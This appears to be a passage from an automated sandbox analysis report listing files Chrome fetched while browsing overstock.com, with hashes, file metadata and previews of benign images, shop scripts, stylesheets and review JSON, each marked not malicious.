                                                                                                                                                          SHA-256:6E33C00A688A7A17BCDC19C75EB8D43FAD8C20668FA7176B69A8BD7F61EBEC7A
                                                                                                                                                          SHA-512:6E2859B91996948960B5614793E47F974DD84CB69910A23E9082C02A8F49B17EE7DA796515D6EA83746B63DD34FF84EEDB8013D0781BE6FC97D1C02466BB9CC1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH_2C-Handmade-Cape-Cod-Eulogia-Coastal-Jute-Rug.jpg?v=1716356818&width=320
                                                                                                                                                          Preview:RIFFL...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....Pc...*@.@.>5..B.!..?F...[./....~@u)y.9.q....}U{.........W..OyO.g./....8.......c.....?.?~>..^.......w....................................O........@?...................=..............?.?.?.}..K.#...../....?..s...Q..........._.?....D......O..........?./.Oi.......o........W.O..s.A..........OzK.?.O...!...2./.....w.....C.....d.......G.?A.3...........3...?..v........._./.?...g.A......_.?....9.........u}........o.?..`..................?.?s.....n.....Qq..&F...p.#cj;..e*..........x..:rq..M...O6...!,.k..a.+].,..KD..D.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):149
                                                                                                                                                          Entropy (8bit):4.680316487189528
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:32BD18BA6BE59F3CC6714765558EB407
                                                                                                                                                          SHA1:5615A8B0C72FBBFF0CB8E90A66C830762F0F44CB
                                                                                                                                                          SHA-256:1CE5E2B045F58A65F34D9162F76C0E334BED0C59303F3133B72857D6F4849370
                                                                                                                                                          SHA-512:5C51A371D69AF91C13FC1B0ED6EE2F074E96BCD28FAE2C6DF2129D7B453284C75BF68F899F5A459FF9459516E166CE745743AF17BDDE6BB532083D9D1DFEC21F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40503128/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40503128","rollup":{"average_rating":4.45,"rating_count":1488,"review_count":1488,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31642
                                                                                                                                                          Entropy (8bit):7.9559567787575665
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E7C457A64A8913ED61AA015D14F41260
                                                                                                                                                          SHA1:D609EE0EC6A8A4B433748BDE9E483A4D87F2EE51
                                                                                                                                                          SHA-256:C04173F8BB2F2A9F13F487A46C4664D1A5476EE7F9CCEFDDB3E7B94549575434
                                                                                                                                                          SHA-512:9C9822AC1BCC728F01A12C65961FEDBCBC6470233A70CB5E66EBE609F111A6BAC82E2FE09DB8D6BC0ABE31CAB003A762540579836598B06D888EB6EF38A1C1D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................X.UzO.^...........%O.{..),u...h.M.B.M.........,$..!..`..cz....F^a.....<...................._N.....B.4...u..y........Jj........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18022
                                                                                                                                                          Entropy (8bit):7.933124489136077
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:32C452F90282FFAB311B641A52B1AC81
                                                                                                                                                          SHA1:F51CC4B20352B27F3FA541F0822158E915F45103
                                                                                                                                                          SHA-256:59D504A66726455001DD762A129C19353B6986692110D26E80F374CAD270B67F
                                                                                                                                                          SHA-512:D4CE0392A4C812EA1EE8703A2B918392F4998CC93071729B500C7611A52614B4833DD5DBD66F4871A303A2E55D26CA257DAD1D37A962F2B43956775EF9F439A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................F.fP..;..".F....+..wI3YZv.......z.Q.#.%$R.....W;.{.R6+*.(...E.;5..yk1.g..?.]B..*Z$Zr.lq.;P.......9K.E..H.J..r)....Cq.Z.o...M.d.K.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1020)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1116
                                                                                                                                                          Entropy (8bit):5.043096738233085
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AC0075E3B1EE38500C764DB5645D7F19
                                                                                                                                                          SHA1:A4469544A4499E3DCCC9CFED9B13294A5977CACD
                                                                                                                                                          SHA-256:C23CC8503546A81A3B7AB291A8BD55F5142809DD06126A43535598CDB0D1A336
                                                                                                                                                          SHA-512:0DB7D43682FABDC4E7CE882BA8304D38D8F2EC77D841FA7F4C46EBB7682EB9E824FAEE09549C9DFC04944833C1422094FF405BA0C3A51FCFB02A6C1E81C3FE6F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/count-down.js?v=127991165756241791691729142870
                                                                                                                                                          Preview:if(!customElements.get("countdown-product")){class Countdown extends HTMLElement{constructor(){super(),this.endDate=new Date(this.dataset.endDate).getTime(),Number(this.endDate)&&window.initLazyScript(this,this.init.bind(this))}init(){this.daysEl=this.querySelector(".js-days"),this.hoursEl=this.querySelector(".js-hours"),this.minsEl=this.querySelector(".js-mins"),this.secsEl=this.querySelector(".js-secs"),this.second=1e3,this.minute=60*this.second,this.hour=60*this.minute,this.day=24*this.hour,this.timer(),this.interval=setInterval(this.timer.bind(this),this.second)}timer(){const timeDiff=this.endDate-new Date;if(timeDiff<0){clearInterval(this.interval);return}const days=Math.floor(timeDiff/this.day),hours=Math.floor(timeDiff/this.hour),mins=Math.floor(timeDiff/this.minute),secs=Math.floor(timeDiff/this.second);this.daysEl.textContent=days,this.hoursEl.textContent=hours-days*24,this.minsEl.textContent=mins-hours*60,this.secsEl.textContent=secs-mins*60}}customElements.define("countdown-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (36511)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36534
                                                                                                                                                          Entropy (8bit):5.658837419730568
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F6106F5B5964EE6A29C11A0E41A897BA
                                                                                                                                                          SHA1:6383B55E025EB19E178220DF9F9A33A8599F8986
                                                                                                                                                          SHA-256:AFDB73B4F15B06F36163A602B03BA327DCAC2B9158B00C7177654EDBE3A1530A
                                                                                                                                                          SHA-512:72EAE4842ECB9B739BA4F0B2740D99FF5BC24C7C4394EFED2D5D60C5BE4E243714AB46CA962CB429BE07872AF9E68A56B947C43C34815F5B5CA95F208704C128
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:var Ae=Object.defineProperty;var Be=(e,t,n)=>t in e?Ae(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n;var ge=(e,t,n)=>(Be(e,typeof t!="symbol"?t+"":t,n),n);import{r as u,j as s,p as Fe,c as P,H as Me,a as $e,b as De}from"./vsearch-vendor.2xH_R9Qb.js";import{s as V}from"./vsearch-facetssearchresultswrapper.Cuju1057.js";var Ue={VITE_BASE_URL:"https://api.overstock.com",VITE_SEARCH_PATHNAME:"/search",VITE_COLLECTIONS_PATHNAME:"/collections",VITE_FACETS_AND_PRODUCTS_API_URL:"/vsearch/products/v1",VITE_AUTOCOMPLETE_SUGGESTIONS:"/search/suggestions",VITE_POWER_REVIEW_API_KEY:"0ce15d13-67ca-47dd-8c72-1d5e4694ada3",VITE_POWER_REVIEW_MERCHANT_GROUP_ID:"1939031562",VITE_POWER_REVIEW_MERCHANT_ID:"1280018588",VITE_SANDBOX_BASE_URL:"https://api-integration.test.overstock.com",VITE_IS_TAXONOMY_FACETS_ENABLED:"false",BASE_URL:"/",MODE:"production",DEV:!1,PROD:!0,SSR:!1};const Ve="/search",We="/collections",Ge="/vsearch/products/v1",ze="/search/suggestions",He="0ce15d13-67ca-47dd-8c72
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22834
                                                                                                                                                          Entropy (8bit):7.9283840307963445
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6C7BF46E5BDACE5CCE2075382152392C
                                                                                                                                                          SHA1:60C62D877A24D8100F28E32B1DC58F2A174960CA
                                                                                                                                                          SHA-256:0F80113F600CFE6FC050807C1830AC8A8A6DBA0E3DF458A2FCBE1BE282108168
                                                                                                                                                          SHA-512:2066B10A46D2CBA634E408897FE5734E1E17C67CCF74FCE571B43D3B362A5FC3EBF3B7E9FC10C8C7EC2CB7BFCDCC0F8C37BB54328711D64C20A567241C381833
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................y.Bie..iIZ..U3v}2...[[.fF5...*r.e.....At,!.>............U.].....YAu....c.%.eL.:....e.7.Fu.4..|o...y.O_......O*.......eJ.TKR9..|..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31
                                                                                                                                                          Entropy (8bit):3.889049535914169
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:211AC1294043CF6B4B4F007F1BF34B05
                                                                                                                                                          SHA1:A451615B60A39F17CDF85346D2EFC878CDDE4EFD
                                                                                                                                                          SHA-256:6543C68AE0A282EC7DEE0B0995AF83611A911D9EEE17E9FC9A783802049D2C6D
                                                                                                                                                          SHA-512:0874DF7ECF22976E235540474E2357C20D940D7567BFAFED9377D9F32585FF13642558A011D81F32806998DBF7B48E21C9BD14B35B48CC2896D1C12F3DFE579F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (27586)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):76308
                                                                                                                                                          Entropy (8bit):5.1219162198299015
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C51B89F7152FEF30B0A8FDD4C2D302BC
                                                                                                                                                          SHA1:F7EB48553C680A0543FAA110A7989BE3E6B2C227
                                                                                                                                                          SHA-256:438D74F32655297BCCA3C08DB91D5F3BC6392E56B5ED58276E7DEA64FF2A400A
                                                                                                                                                          SHA-512:7BF6AC4D6FBBAFA5F1247E3AC750A8C891C410C1EE1624C7C0761C63B262EAE16E42B428CE922D4FE192BC4F1CFE9D3C26F87AFCE69EEB459C400BD9B43D3F25
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/flickity.pkgd.js?v=174443963530233707351729142870
                                                                                                                                                          Preview:/*!. * Flickity PACKAGED v2.3.0. * Touch, responsive, flickable carousels. *. * Licensed GPLv3 for open source use. * or Flickity Commercial License for commercial use. *. * https://flickity.metafizzy.co. * Copyright 2015-2021 Metafizzy. */(function(window2,factory22){typeof define=="function"&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(jQuery){return factory22(window2,jQuery)}):typeof module=="object"&&module.exports?module.exports=factory22(window2,require("jquery")):window2.jQueryBridget=factory22(window2,window2.jQuery)})(window,function(window2,jQuery){"use strict";var arraySlice=Array.prototype.slice,console2=window2.console,logError=typeof console2=="undefined"?function(){}:function(message){console2.error(message)};function jQueryBridget(namespace,PluginClass,$){if($=$||jQuery||window2.jQuery,!$)return;PluginClass.prototype.option||(PluginClass.prototype.option=function(opts){$.isPlainObject(opts)&&(this.options=$.extend(!0,this.options,opts))}),$.fn[
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5384)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5483
                                                                                                                                                          Entropy (8bit):4.981696067980112
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:62C7DE4AA20D80DCAB441B5025C5BEAE
                                                                                                                                                          SHA1:80FD2C33C09302CC5D7450EF67F8E554F522C7E4
                                                                                                                                                          SHA-256:740E44F12C86D5038B073CC1A6A8FFBE73D652745FE7502A2BDD0076F18B5F64
                                                                                                                                                          SHA-512:9C52F8FE5DD4DB6BA83E539831B27DC1DE2618725928804CC205B59E1822F3175E24497B7976BD52BE112CB9674FB09A75BDB049DA3A569EBB135966A6E5C57F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/cart-items.css?v=91900140668399919651729142870
                                                                                                                                                          Preview:.free-shipping__notice{margin-bottom:0}.free-shipping-container{margin:calc(6 * var(--space-unit) * -1) 0;padding:calc(8 * var(--space-unit))}.free-shipping-container.color-scheme{--btn-bg-color: var(--heading-color);margin-bottom:calc(6 * var(--space-unit));padding:calc(6 * var(--space-unit)) calc(8 * var(--space-unit))}cart-drawer .free-shipping-container{margin:calc(var(--gutter) * -1) calc(var(--gutter) * -1) 0}.cart .free-shipping-container:not(.color-scheme){margin:0 0 calc(12 * var(--space-unit));padding:0}.free-shipping-notice__bar{height:8px;border-radius:var(--btn-border-radius);background-color:rgba(var(--text-color)/.2)}.free-shipping-notice__bar:after{content:"";display:block;width:var(--progress);height:100%;transition:width .3s ease-out;border-radius:var(--btn-border-radius);background-color:rgb(var(--btn-bg-color))}cart-items{position:relative}.cart-items tr{border-bottom:1px solid rgba(var(--text-color)/.15)}.cart-items td{border:0;vertical-align:top}.cart-item{grid-te
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65460)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111802
                                                                                                                                                          Entropy (8bit):5.268240482340551
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5B9D8BAA112D5D1FE1575BC547A2D11C
                                                                                                                                                          SHA1:017C071245A55242CFABDBB70CE8D3D628B7A18F
                                                                                                                                                          SHA-256:2E5AA81E02F13EB7E2376331A641BC0BDF3DCFBC769872074CC3134C3FC4D0E3
                                                                                                                                                          SHA-512:0642614B00E1CBC28F3F669CE9473D4528F151644D1702001B5503BB9FC3615DB7C77721BD4C652CB3D67E2D6CC8AC4600443D8E2F1B8494334DEF96539193F7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*! For license information please see nr-spa-1.265.1.min.js.LICENSE.txt */."use strict";(self["webpackChunk:NRBA-1.265.1.PROD"]=self["webpackChunk:NRBA-1.265.1.PROD"]||[]).push([[478],{7699:(e,t,i)=>{i.d(t,{I:()=>r,N:()=>s});const s=64e3,r=1e6},9527:(e,t,i)=>{i.d(t,{n:()=>c});var s=i(9422),r=i(4777),n=i(4624),a=i(2838),o=i(2614);class c extends r.J{constructor(e,t,i){super(i),this.endpoint=e,this.opts=t||{},this.started=!1,this.timeoutHandle=null,this.aborted=!1,this.harvesting=!1,this.harvest=new n.M(this.sharedContext),(0,a.Q)(this.unload.bind(this)),this.sharedContext?.ee.on(o.tS.RESET,(()=>this.runHarvest({forceNoRetry:!0})))}unload(){this.aborted||(this.opts.onUnload&&this.opts.onUnload(),this.runHarvest({unload:!0}))}startTimer(e,t){this.interval=e,this.started=!0,this.scheduleHarvest(null!=t?t:this.interval)}stopTimer(e=!1){this.aborted=e,this.started=!1,this.timeoutHandle&&clearTimeout(this.timeoutHandle)}scheduleHarvest(e,t){this.timeoutHandle||(null==e&&(e=this.interval),thi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17258
                                                                                                                                                          Entropy (8bit):7.952560433627176
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8BD3F90369E7D6B8B2B24FCF382F91C1
                                                                                                                                                          SHA1:FEB55ED73EBFB3F74F55EAB555C124C0F7601410
                                                                                                                                                          SHA-256:94F66DAE2A75E932ADCC603D57145268AF1C99B86D28EC49C103625F93D3F722
                                                                                                                                                          SHA-512:2C05405946C63D2B49BA393CF994E486ACF2172AF64C26584443B3C42FB3C44EFD2367BE0CDD557B03BE350C261722DD26E9BFED0187C67C8FD1E57687F15491
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Somette-Monterey-Butternut-Futon-Frame-and-Mattress.jpg?v=1715319532&width=320
                                                                                                                                                          Preview:RIFFbC..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .@.......*@.@.>9..D"!..y.. ....}.{..%U.=6.......:............|$.6....7.?..E..._...=..w.u.........._.=..h...K.......?..n....{..a........Z....>.......?s~.?............p..>........?.>..o....5.1...............m|N.....o..S......./._.=g.+..i.U.;.O..._W......3...[....`..O...|.s.O.......O.?..0....._.o...........x...G.....w..,...W.J..W.$.N....%sn+..j.s.U......X...rX.....{..)..C`.H.+./.+x..9m)m.ogy......hI...6.2.6q...........W...+......A.QcI........TM".....j&.ZLZQ.0omJO.5.........:.*./H..../n...v..%.P....[;...7..'RoY=..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2203)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19691
                                                                                                                                                          Entropy (8bit):4.757103689079069
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D5EB351AA4E7AA19742EFDC05953335E
                                                                                                                                                          SHA1:753DF8736BE431C1AAFA23364C55228D7C26CBE8
                                                                                                                                                          SHA-256:7F3B0E3A85372A68BD8BA25695205BAB658A37FFD128B67C9C1EAF861D34C06C
                                                                                                                                                          SHA-512:6B5C78258270B85D3580037F0E4A46BBCA222E4F4526AD924C048267CFD845D67FDB68F1E256B128847C9D7ED8C1CE5740B8B513FDCA6A9FEEFBE9887A07C5F7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:class ContentCards extends HTMLElement{constructor(){super(),this.closeBtn=this.querySelector("#close"),this.body=document.querySelector("body"),this.refreshBtn=this.querySelector("#refresh"),this.refreshBtn&&this.refreshBtn.addEventListener("click",()=>{this.refreshBtn.querySelector("svg").classList.add("rotate"),this.refreshCards()}),this.closeBtn.addEventListener("click",this.toggleModal.bind(this)),this.cards,window.addEventListener("load",()=>{setTimeout(()=>{braze.subscribeToContentCardsUpdates(),braze.requestContentCardsRefresh(),this.cards=braze.getCachedContentCards().cards,this.cards.length>0?(this.renderCards(this.cards),this.querySelector("#refresh").classList.remove("hidden")):this.renderEmpty(),this.setBadge(this.getUnreadCardCount())},1e3)}),document.querySelector(".head-slot-bell").addEventListener("click",()=>{braze.logContentCardImpressions(braze.getCachedContentCards().cards),this.toggleModal()}),document.addEventListener("click",e=>{!e.target.closest(".content-cards
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4347)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4453
                                                                                                                                                          Entropy (8bit):5.024613101449079
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9AF3D3B65DB5C71CA5101051211050D8
                                                                                                                                                          SHA1:C305BD0A1B78CCF651EB76766F9591B0C85C38C5
                                                                                                                                                          SHA-256:90E74BCB101C7A735EA8AFCECC38DAD3806E1DD93E302E412A6F6FB1C3FB84C2
                                                                                                                                                          SHA-512:B1D477C87B06998E8CC9BABCC7C4C043C70E646052B28926CB2631469CCC55EBD3CF57462769E3F892D0F1908DAD23328460A6C2772050E1AEEC428E154BC20D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/os-search-results.css?v=93718395236406313381729142870
                                                                                                                                                          Preview:.shopify-section.cc-apps.section{margin-top:calc(6 * var(--space-unit))}.template-collection .block-section,.template-search .block-section{margin-top:16px;margin-bottom:16px}@media only screen and (max-width: 844px){.template-collection .block-section,.template-search .block-section{padding:0}}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-0-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-empty.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-25-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-25.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-50-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-half.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-75-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-75.svg)}[id*=pr-reviewsnippet] div.p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (63742)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):138676
                                                                                                                                                          Entropy (8bit):5.323216462813201
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E4F887886B5F8857BE570CAD210A29BA
                                                                                                                                                          SHA1:891985711A08895CFE59114CB566D623270F3BED
                                                                                                                                                          SHA-256:1B0780417BD794CC64994AE081819C648E84B69A7513861246E028458E08FD4A
                                                                                                                                                          SHA-512:6414021985392F0284F693EC8009096F7F39E079F17F58283D90D8F2C3E1665043D7790C3FE12D81522D9008BD68CBEA8E1DBAB028B664D0BD2FB32B32218FA1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/OnePage.CPFaJZfk.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayWrapper.K9jgEswg.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","context.Cu9sylBE.js","usePreselectSpi.CTkStXQ2.js","Section.DDmRJFSq.js","assets/Section.sQehCocD.css","publishMessage.Zuhtx4a1.js","ShopPayLoginLoader.C5akmUKr.js","assets/ShopPayLoginLoader.CjGSo8kt.css","PayButtonSection.6z826TXQ.js","Rollup.B3ludNL-.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.fhQjPey-.js","RageClickCapture.BFDgLbCX.js","MarketsProDisclaimer.BZXsgf5w.js","assets/RageClickCapture.DnkQ4tsk.css","assets/PayButtonSection.DF7trkKf.css","DeliveryMethodSelectorSection.DmSUYxZn.js","useUnauthenticatedErrorModal.gdEu53Hp.js","LegacyVaultedShippingMethods.8dZ3Q6PP.js","SubscriptionPriceBreakdown.CcRBYBQn.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","ShopPayLogo.D_tvM4Kt.js","assets/ShopPayLogo.D_HPU8Dh.css","index.Da9Wf6zy.js","PickupPointCarrierLogo.C-y5TkoQ.js","assets/PickupPointCarrierLogo.C0wRU6wV.css","hooks.CY4n-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12973
                                                                                                                                                          Entropy (8bit):7.780468264936944
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:85F7A0D5A8EB00A5158C7BB5CFB05BCC
                                                                                                                                                          SHA1:F983DE7B6717940DE0B8100DDF17A4B108D90D39
                                                                                                                                                          SHA-256:2080931569C0FE66B513429157CD505CCFE8E75CC0D0E293638D6E4105443D66
                                                                                                                                                          SHA-512:2D185E1F6E101BA79E8FE8A998DE11AEC3ABC8255AA16DE002A661A68125E41F1C1F0999F33916901A96EC97678AABF96020B3C8E7CD16617DBD4E73941D75B7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................X...................................................................................p.X...-T. ........a..y~..9.{...w.....?.o...X..{.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (19421)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19478
                                                                                                                                                          Entropy (8bit):5.356181973976775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1F336B8F4C8F0033ADE5DE23A48F5CFC
                                                                                                                                                          SHA1:3DAFEB2262CD6D126620BF4795A96849678BEBEA
                                                                                                                                                          SHA-256:F4E288B956A253D629345E082AC38F3B4E13CCF34B32B02A5DE1C11C6BEE52B4
